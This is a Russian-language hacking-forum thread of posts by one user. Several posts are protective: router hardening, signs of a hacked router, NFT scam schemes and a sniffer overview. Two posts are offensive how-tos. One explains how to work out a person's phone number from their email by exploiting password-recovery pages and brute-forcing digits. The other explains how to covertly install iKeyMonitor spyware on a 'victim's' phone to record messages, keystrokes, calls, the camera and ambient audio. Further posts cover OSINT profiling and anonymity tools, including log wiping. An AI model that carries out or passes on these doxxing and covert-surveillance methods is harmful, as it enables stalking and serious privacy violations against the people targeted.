Кто бы мог подумать, что такое устройство как Wi-Fi-роутер может стать серьёзной угрозой для вашей личной безопасности. Большинство людей пренебрегают защитой беспроводных маршрутизаторов, потому что недооценивают возможный вред, который может нанести злоумышленик, взломав ваше соединение. В этой статье вы узнаете чем это опасно и найдете простые способы защиты роутера.​



Что случится, если ваш роутер взломают?

  • Перехват паролей и других данных, которые вы передаёте по сети;​
  • Заражение компьютера вредоносным ПО;​
  • Слежка за вашей активностью в сети;​
  • Блокировка Интернет-соединения;​
  • Доступ к веб-камерам;​
  • Использование вашего соединения для совершения преступной деятельности.​
И многое другое…
Взлом роутера – это настоящая угроза для любого пользователя со серьёзными последствиями. Но не стоит впадать в панику, ведь «спасение утопающих – дело рук самих утопающих», и сейчас мы поделимся с вами способами защиты от подобных атак.
Как защитить роутер от хакеров

Измените учетные данные администратора роутера

Учетные данные администратора по умолчанию находятся в общем доступе для всех пользователей. Если вы никогда не обновляете учетные данные для входа в систему после получения роутера, вас можно считать легкой добычей для хакеров, потому мы настоятельно рекомендуем устанавливать надёжный пароль. Для этого:
  • Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Далее выскочит окно с полями для логина и пароля.​
  • Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру или на его корпусе.​
  • Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется вкладка, где вы сможете изменить пароль.​
Включите WPA2 (защищенный доступ Wi-Fi)

Это самый безопасный на сегодняшний день протокол шифрования. В сочетании с надёжным паролем он даст вам прочную защиту. Вы также можете встретить его другой вариант - это WPA-PSK.






Правильный протокол шифрования не менее важен, чем пароль. Например, устаревший протокол WEP может быть с лёгкостью взломан за пару часов.
Измените сетевое имя вашего роутера (SSID)

Во время настройки роутера также не забудьте изменить SSID. Чтобы хакеры не смогли узнать ваш тип роутера, установите свое собственное сетевое имя. Шифрование WPA использует SSID как часть алгоритма, поэтому избегайте имён по умолчанию, так вы сделаете свою сеть более устойчивой к разным видам взлома.
Отключите WPS

На большинстве роутеров есть WPS (защищенная настройка Wi-Fi), что означает, вы можете нажать кнопку и ввести PIN-код для подключения вместо привычного пароля. Возможно, для кого-то такая функция является очень удобной, но мы не советуем использовать PIN-код вместо пароля. Ведь одним нажатием кнопки WPS, любой сможет подключиться к сети.
К сожалению, не все роутеры поддерживают деактивацию функций WPS, поэтому заранее позаботьтесь о том, чтобы у вашего роутера была такая функция.
Деактивируйте удаленный доступ

Проверьте, подключена ли функция удаленного администрирования на вашем роутере. Она позволяет входить в настройки администратора роутера из любой точки. Деактивировав эту функцию, вы повысите уровень защиты вашего соединения. Как узнать, что удалённый доступ подключён на вашем устройстве?Зайдите в веб-интерфейс и посмотрите, подходит ли стандартная учётная запись admin / admin, если да, то скорее измените пароль.
Заключение

Все выше написанные советы гарантированно обеспечат безопасность вашему Wi-Fi-роутеру, поэтому приступайте к их выполнению прямо сейчас. А в следующей части мы расскажем, как понять, что ваш роутер уже был взломан, и какие меры нужно принять в таком случае.​
Удачи!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
С растущей популярностью NFT-токенов, набирают обороты разные способы мошенничества, которые становятся все изощреннее. Если вам кажется, что вы знаете о криптоскамерах все, то не спешите уходить, нам есть чем вас удивить.


Rug Pull

Схема мошенничества, при которой разработчики забрасывают проект, забирают деньги и уходят в закат. Как правило, разработчики выпускают новую коллекцию NFT, пускают все ресурсы на рекламу проекта и в̶е̶ш̶а̶ю̶т̶ ̶л̶а̶п̶ш̶у̶ ̶н̶а̶ ̶у̶ш̶и̶ красочно рассказывают о планах на развитие. По мере того, как проект набирает популярности среди инвесторов, скамеры удаляют соцсети и оставляют проект без поддержки. Как результат, пользователи, вложившие деньги, остаются с NFT, которые ничего не стоят. Зачастую участниками ****-проекта становятся, ничего не подозревающие, медийные персоны. Для того чтобы привлечь внимание к проекту проводятся различные розыгрыши и раздачи, которые вызывают у людей интерес к проекту. Приведем в пример Флойда Мейвезера, который рекламировал в своем Twitter такие проекты, как Bored Bunny, Ethereum Max, Moonshot.
На Frosties, одном из самых громких ****-проектов в США мошенники заработали 1 млн долларов. Они не выполнили обещаний и исчезли вместе с деньгами инвесторов.
Фишинг

Распространённый способ мошенничества, когда злоумышленники получают доступ к данным пользователей с помощью ссылок на поддельные сайты, имитирующих страницы известных криптопроектов.
Орудуют такие скамеры, как правило, в соцсетях, отправляя рассылки от имени известных NFT-проектов. В таких сообщениях содержатся завлекательные условия, например: скидка на покупку NFT. Однако, при переходе по ссылке, вы попадёте на фишинговый сайт, а при покупке, лишитесь средств со всего кошелька.
В числе жертв фишинговой атаки оказался популярный NFT-художник Beeple. Скамеры взломали его Twitter и разместили ссылку на фейковую коллекцию совместного NFT с Louis Vuitton. В итоге подписчики, решившие купить NFT, лишились денег, а мошенники получили ETH на сумму в 438 тысяч долларов.

Pump Dump

Манипуляция, которая позволяет повысить курс NFT с последующим обвалом цены. Скамеры всеми способами создают ажиотаж вокруг NFT для дальнейшего повышения цены токенов (памп). Затем стоимость токена обесценивается (дамп), и инвесторы теряют деньги.
Логан Пол, актер с 23 миллионами подписчиков на ютубе, стал еще одной медийной личностью, замеченной в продвижении мошеннических проектов. Ему удалось привлечь внимание к таким NFT, как Dink Doink NFT, Crypto Zoo, EMAX и Maverick. Так, их популярность вместе с ценой резко возрастали, а затем падали.
Фейковые коллекции

Мошенники подделывают коллекции известных NFT художников, а затем публикуют их на торговых площадках. Инвесторы думают, что покупают оригинал, а на самом деле это лишь фейк.
С помощью этого способа в апреле 2021 года мошенники умудрились продать коллекции, уже умершей на тот момент, художницы Qinni. Когда ее семья забыла тревогу, скамеры уже завладели кругленькой суммой денег доверяемых подписчиков.
Как не попасться

  • Внимательно проверяйте домен сайта, к которому подключается кошелек. Дабы не зайти на фишинговый сайт, сохраните в закладках реальные ссылки на площадки, которыми вы пользуетесь;​
  • Если в соцсети какого-то проекта появляется выгодное предложение, не спешите покупать. Проверьте и другие источники, есть вероятность, что аккаунт был взломан хакерами;​
  • Многообещающие предложения о дальнейшем развитии проекта также должны насторожить вас. Чтоб на попасться на схему Rug pull, отдавайте предпочтение проектам с реальными и хорошо распланированными целями;​
  • Смотрите на показатель ликвидности. Высокий объем торгов указывает на то, что коллекция активно покупается и продаётся, а значит вы можете продать NFT на вторичном рынке.​
С развитием NFT, появляются и новые способы мошенничества, но знания и умения распознать угрозу помогут вам сберечь средства. Здраво оценивайте все предложения и проверяйте интересующие проекты. Удачи!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150
В прошлой статье мы рассказали, как защитить свой роутер от хакеров, и чем опасен взлом. Но как понять, что ваша сеть стала уязвимой, и как вернуть над ней контроль? Обо всем по порядку.​
Мы надеемся, что вы учли и предприняли все наши советы по безопасности роутера, но если вы всё-таки заметили подозрительную активность на вашем ПК или просто хотите убедиться, что с вашим Wi-Fi все в порядке, то советуем обратить внимание на следующие признаки, свидетельствующие о том, что вас хакнули.





Как понять, что ваш роутер взломан:
  • В сети Wi-Fi появились новые устройства. Чтобы узнать, подключалось ли к сети неизвестное устройство, войдите в свой роутер и проверьте список IP-адресов в вашей сети на наличие иных подключений.​
  • Изменились настройки DNS. Хакеры часто меняют настройки для подключения к вредоносным серверам, которые крадут ваши персональные данные и даже заражают устройство вирусами. Для того, чтобы узнать к какому серверу подключается ваш ПК, зайдите в DNS настройки вашего роутера в меню администратора.​
  • Учетные данные администратора изменились. Если вы не можете подключиться к сети Wi-Fi, то логично предположить, что хакеры поменяли пароль и учетные данные вашего роутера, тем самым лишили вас доступа к Интернету.​
  • Скорость интернета упала. Хотя причин этому очень много, но, если вы проверили все параметры, а скорость так и не увеличилась, то есть вероятность, что злоумышленник использует пропускную способность вашего Wi-Fi.​
  • Вредоносное ПО. Наличие вируса - это повод бить тревогу. Если вы не могли самостоятельно подцепить вредоносную программу, то скорее всего кто-то это сделал за вас.​
Если вы обнаружили на своём устройстве более 2-х вышеназванных пунктов, то ваш роутер скорее всего взломали.
Как вернуть контроль над устройством:

Выполнив следующие действия, вы не только избавитесь от хакеров, но и очистите свой компьютер от вредоносного ПО.
Выключите роутер

Первым действием требуется разорвать соединение между вашим устройством и хакером. Для этого отсоедините интернет-кабели и на время отключите все устройства, подключённые к Wi-Fi.
Сбросьте роутер до заводских настроек

Все роутеры оснащены специальной кнопкой сброса, вам, возможно, пригодится скрепка или иголка, чтобы нажать на нее.
Сброс к заводским настройкам удаляет все изменения параметров роутера, в том числе все сетевые настройки, которые были ранее установлены. Если злоумышленнику известен пароль и учетные данные администратора, то они станут недоступны после сброса.
Измените учетные данные администратора

После сброса восстановите заводские настройки по умолчанию. На самом роутере или в руководстве записаны логин и пароль для входа, используйте их. Однако, сразу же поменяйте их на сложную комбинацию букв и цифр, состоящих не менее чем из 15 символов, дабы избежать повторной атаки.
Установите SSID и пароль Wi-Fi

Помните, что сложные названия и пароли защищают вашу сеть от взлома.
Обновляйте прошивку

Не все роутеры автоматически обновляют прошивку, поэтому лично позаботьтесь об этом. Зайдите в меню администратора -> настройки прошивки и обновите ее до новейшей версии. Любые хакерские атаки, нацеленные на вашу старую прошивку, должны стать неэффективными. Раз в пару месяцев проверяйте наличие новых прошивок и обновляйте их.


В дальнейшем любые атаки на ваш роутер станут неэффективными.
Удачи!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150


Вступить в наш чат

Думаете, что вычислить номер телефона с нуля невозможно? Вы будете приятно удивлены, узнав, что это не так. Мы проявили немного изобретательности и ловкости, и нашли действенный способ. И сегодня мы вам о нем поведаем.






Для того, чтобы узнать номер телефона человека, вы должны знать его:

email;
инстаграм;
вк.

Хотя другие соц. сети и аккаунты нам тоже могут помочь. Читайте до конца.
Собираем пазл из цифр телефона

Этот способ представляет из себя собирание пазла по кусочкам. Да, он требует усилий и вашего времени, но результат себя оправдывает.

1) Первые 5 кусочков пазла или же 5 цифр номера телефона мы можем получить из восстановления почты.

Безусловно, для этого вам нужно знать имейл пользователя, чей телефон вы пробиваете.






Восстановление mail.ru почты даст нам первые 5 цифр (на доменах list, bk, mail, inbox, internet). Таким образом, получаем: +79998******.


2) Следующие 2 цифры получаем методом перебора в почте. Но тут стоит отметить, что, после 10 попыток почта ставит ограничение на час (поэтому максимально понадобится времени ~9 часов) Теоретически, вы можете просидеть и дольше, чтобы узнать 3-4 следующие цифры, но в этом уже нет особого смысла, так как есть способ быстрее.

Получаем: +7999890****






3) Последние 2 цифры можно получить через восстановление этих соц.сетей:

• Instagram (только в приложении, по аккаунту/почте)

Нужно нажать по своему логину в Instagram и выбрать «Добавить аккаунт», затем «Войти в существующий аккаунт».

В следующем окне выбираем «Забыли пароль?» и далее вводим логин профиля. Готово. Теперь мы имеем последние 2 цифры телефона.






• Google (по аккаунту/почте + ФИ)

• Microsoft (по аккаунту/почте)

• Facebook (по полному имени/почте)

Получаем: +7999890**55


4) Оставшиеся 2 цифры можно перебрать по "номеру телефона", всего 100 вариантов:

• Skype (в начале проверяется почта, а потом по номеру ищется этот же аккаунта, ограничения не известны)

• Microsoft (ограничения не известны)

• Google (ограничения не известны)

• Facebook

• Сбербанк (15 попыток перевода)

• ВК (нужен сам аккаунт, капча на каждую проверку)


Остаётся только проверить полученный номер телефона на валидность.

Вуаля. Пазл собран.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150




Вступить в наш чат

Хотите узнать с кем человек ведёт переписки в телефоне, какие сайты посещает и где он находится в данный момент? Вы можете отслеживать ВСЕ его действия в телефоне 24/7. И сегодня мы расскажем вам как установить слежку в телефоне с помощью приложения iKeyMonitor. Оно доступно как на Android, так и на iOS устройствах.

Вся информация в этой статье предоставлена исключительно в ознакомительных целях. Мы не несем ответственности за ваши действия.






iKeyMonitor
Что это за программа

Данное приложение было разработано для родительского контроля за телефоном ребёнка, но тем не менее оно широко вошло в обиход среди любителей пошпионить за телефоном других пользователей.
Стоимость

Стоит отметить, что приложение является платным, но имеет 30 дневный бесплатный пробный период. Если вам оно не нужно на постоянной основе, то пробного периода вполне будет достаточно, чтобы вывести жертву на чистую воду.

Ну а если вы захотите продлить, то стоимость подписки следующая:





Месяц полного мониторинга обойдётся вам примерно в 3700р.
Как работает








1. В отличие от других приложений для мониторинга, которые могут отслеживать действия только конкретных приложений, iKeyMonitor контролирует абсолютно каждое приложение, записывая нажатия клавиш.
2. Приложение позволяет удаленно делать фотографии и скриншоты в режиме реального времени. Вы сможете видеть, что окружает жертву в данный момент.
3. Функция Ambient Listening & Recording позволяет записывать и слушать окружающие звуки в режиме реального времени.
4. iKeyMonitor записывавает сообщения и сразу отправляет их вам. Даже если жертва сразу удалит переписку, сообщения останутся у вас в истории.
5. Удаленно записывает входящие и исходящие звонки с помощью встроенного диктофона.
6. И, конечно, же отслеживает любую активность в приложениях.








Регистрация

Выберите тип устройства жертвы.





При этом приложение спросит, есть ли у вас доступ к девайсу, за которым вы хотите установить слежку. Вам придётся применить СИ, чтобы установить программу на телефон жертвы.








Проверьте почту для подтверждения регистрации.

После этого выполните вход и вы увидите панель, которая выглядит следующим образом:





Готово! Теперь ничто не ускользнёт от вашего взора.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150




Вступить в наш чат

В наши дни уже невозможно найти человека в Интернете, у которого нет ни единого профиля в соцсетях. Как правило, пользователи выкладывают много личной информации и контента: фото, видео, образование, круг общения и даже геолокацию. Другими словами, они делают себя доступной мишенью для злоумышленников. Но как же быстро найти и собрать все эти данные о человеке?

Сегодня мы расскажем о полезном инструменте, без которого не обойтись начинающему OSINTеру при сборе информации в социальных сетях.






Social Analyzer

Social Analyzer находит профили в более чем 1000 социальных сетях. Инструмент содержит различные модули анализа и обнаружения, и вы можете выбрать, какие модули использовать в вашей разведке.

Основан на технологии OSINT, что означает технологию разведки с открытым исходным кодом. Этот инструмент позволяет пользователям находить потенциальные профили человека в более чем 1000 социальных сетях, веб-сайтах и веб-приложениях. Social Analyzer использует различные модули анализа для поиска профилей человека, поэтому так активно используется многими правоохранительными органами для расследования киберпреступлений.
Подготовка

Для работы вам, конечно же, понадобится Kali Linux.

Устанавливаем Kali Linux,
Скачиваем на GitHub Social Analyzer.
Этот инструмент написан на python, поэтому в вашем Kali Linux должен быть установлен python.

Установка

Откройте терминал операционной системы Kali Linux и используйте следующую команду для установки инструмента:





Инструмент был установлен в Kali Linux. Теперь посмотрим, как он работает на примере.

Используя социальный анализатор, найдите данные о человеке в самых популярных соц. сетях. Для этого введите команду с ником или именем пользователя.

social-analyzer --username "nickname" --metadata






Готово. Утилита нашла все совпадения никнейма пользователя в самых популярных социальных сетях и собрала метаданные о нем. Как видите, инструмент очень прост в использовании. Удачи!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150




Вступить в наш чат

В Интернете нас окружает множество ситуаций, ставящих под угрозу нашу безопасность, поэтому мы находимся в вечной погоне за анонимностью, но действительно ли мы анонимны? Малейшая ошибка, невнимательность и ваша личность будет раскрыта. Но существует инструмент, который поможет оставаться вам в тени при любых обстоятельствах, и название ему — WHOAMI. Он обеспечивает повышенную конфиденциальность и анонимность при использовании Linux ОС.




Установка

Прежде чем мы начнем устанавливать этот инструмент на наш Linux, мы должны проверить несколько инструментов, которые являются обязательными для этого инструмента, такие как: -tar, git, tor, curl, python3, python3-scapy.

Как правило, они уже установлены в нашем Linux, но если у вас их нет, вы можете просто запустить следующую команду:

sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager

Можем двигаться дальше. Введите в терминале:

git clone https://github.com/omer-dogan/kali-whoami

Теперь измените директорий на kali-whoami:

sudo make install

И после этого наш инструмент готов к использованию, мы можем открыть его интерфейс, выполнив эту команду:

sudo kali-whoami --help





Запускаем инструмент с помощью этой команды:

sudo kali-whoami --start





Здесь мы должны выбрать параметры, которые мы хотим включить, для этого просто выберите цифру для включения, а если вы хотите отключить, то нажмите этот номер еще раз.





После включения, у вас появится галочка рядом с номером, значит, что защита работает, и вы анонимны.
Опции

Ниже приведены возможности инструмента:

1. Anti Mitm — блокирует Mitm-атаку. Mitm или man-in-the-middle - это атака, когда злоумышленник пропускает трафик жертвы через себя, то есть получает доступ к вашему логину, паролю, а еще ведёт прослушку и многое другое.

2. Log Killer — с помощью log killer вы удалите все ваши журналы, логи.

3. IP changer — тут все элементарно, скрипт меняет ваш айпи.

4. DNS changer — помогает изменить DNS сервер, используемый при подключении к сети.

5. Mac changer — даёт возможность сменить MAC-адрес компьютера.

6. Timezone changer — установка иного часового пояса.

7. Hostname changer — задаёт другое имя хоста (имя компьютера), чтобы нельзя было идентифицировать в сети.

8. Browser anonymization — после включения этой функции мы напрямую подключаемся к браузеру tor и можем анонимно сёрфить.

9. Anti cold boot — предотвращает атаку методом холодной перезагрузки, при которой хакер может извлекать из вашего ПК ключи шифрования и другие ценные данные.

Как видите, возможности внушающие, вам лишь остаётся определиться с нужными именно вам опциями и просто подключить их.


Чтобы проверить статус подключения, используйте следующую команду:

sudo kali-whoami --status






Инструмент поможет оставаться вам анонимными до тех пор, пока вы его не отключите, выполнив следующую команду:

sudo kali-whoami --stop




На этом все. Удачи!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150




Вступить в наш чат

В этой статье речь пойдет о создании токена, а именно ERC-20. Используя генератор токенов Token Generator dApp на платформе SmartContracts Tools вы можете за несколько минут создать новый токен на блокчейне Ethereum или BNB.






Переходим на сайт SmartContracts Tools и выбираем Token Generator.

Для создания токена необходимо подключиться к платформе MetaMask. На данный момент в сервисе можно найти несколько тарифных планов. У вас есть возможность сделать токен HelloÈRC20 за бесплатно, SimpleERC20 будет стоить 0,03 ETH, а за PowerfulERC20 придется заплатить 0,5 ETH. Можно выбирать дополнительные функции для увеличения эмиссии, дефляционных свойств и т.д.






Вам нужно указать тип токена и блокчейна, на котором он будет размещен. На данный момент доступны к использованию ERC20-токены с использованием Ethereum и PolyGon, а также BEP20-токены на базе Binance SmartChain.
При выборе ETH, вы можете развернуть токен в основной сети или на тестовой сети Sepolia.
А дальше все просто: выбираем новому токен название и знак, которые он будет иметь.
Указываем характеристики эмиссии: ограниченная, фиксированная или бесконечная. Далее указываем кто получает доступ к токену. Также можно указать роль администратора или ответственного по эмиссии.

В любом случае, даже если вы выбрали бесплатный тариф, вам придется заплатить за газ.

Как только все поля будут заполнены, появится надпись “Создать токен”, подтверждаем и становимся счастливыми обладателями собственного цифрового актива ERC-20, который имеет верифицированный код смарт-контракта.






Вот так просто, за два клика можно создать собственный токен. Дальнейшее использование зависит лишь от вашей фантазии и необходимой задачи. Пользуйтесь с умом и следите за новыми статьями! На этом все. Удачи!​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
234
Реакции
7
Total Sell
$0
Total Purchase
$150




Вступить в наш чат

Любой пользователь сети может стать жертвой сниффинга. Хакеры все чаще используют анализаторы траффика для взлома, поскольку они славятся своей простой и эффективностью. Когда речь заходит про снифферы, у многих возникает путаница в терминологии и непонимание, как это работает. Сегодня мы постараемся подробно все рассказать.

Поехали!
Что это такое

Сниффер (от англ. sniff - нюхать) — это программа для перехвата и анализа данных в сети.







Для чего нужно

Как правило, снифферы используются во благо, т.е. для анализа трафика с целью выявления и устранения отклонений в процессе работы. При этом хакеры нашли им другое применение, которое может нанести вред обычным пользователям. Так, они могут использовать их для перехвата логинов, паролей и другой необходимой им информации. Злоумышленники чаще всего ставят снифферы в местах, где есть незащищенное подключение Wi-Fi: кафе, аэропорты, ТРЦ.
Виды снифферов

Выделяют два вида снифферов:

локальный сниффер
онлайн сниффер

В зависимости от типа, снифферы могут передаваться онлайн, например, в виде ссылок или устанавливаться непосредственно на компьютер.

Сниферры могут быть разных видов, но все их объединяет одно — перехват траффика.
Обзор снифферов
CommView

Декодирует пакеты передаваемой информации, а затем выдает статистику используемых протоколов.Он может собирать информацию о трафике IP-пакетов. Также он может работать с популярными протоколами.

Сниффить данные можно при помощи вкладки «Текущие IP-соединения», где вы можете создавать дубликаты адресов.
Spynet

Spynet выполняет функции декодирования пакетов, их перехвата. С его помощью можно воссоздать страницы, которые посещает пользователь. Интерфейс просто в использовании. Для перехвата данных необходимо запустить программу Capture Start. Так же программа является бесплатной.
BUTTSniffer

BUTTSniffer анализирует непосредственно сетевые пакеты. Принцип работы — это перехват передаваемых данных, а так же возможность их автоматического сохранения на носителе, что очень удобно. Запуск данной программы происходит через командную строку.


Помимо этих программ-снифферов, существует множество других, не менее известных: CooperSniffer, WinDump, Ne Analyzer, dsniff, NetXRay, NatasX, LanExplorter.


Как защититься

Обнаружить сниффер гораздо проблематичнее, чем сразу принять меры по защите от него.

Регулярно делайте проверки на наличие уязвимостей в локальной сети;
Избегайте Wi-Fi подключения в общественных местах;
Используйте антивирус со сканером сети, распознающий снифферы;
Задайте сложные уникальные пароли;
Зашифруйте каналы связи с помощью криптографических систем.


Вывод

Как вы могли заметить из данной статьи, пользователь сам решает в каких целях ему использовать сниффер - во благо или для хакинга. Как бы то ни было, мы желаем вам удачи! Надеемся, что данная информация была полезной.​
 
Сверху Снизу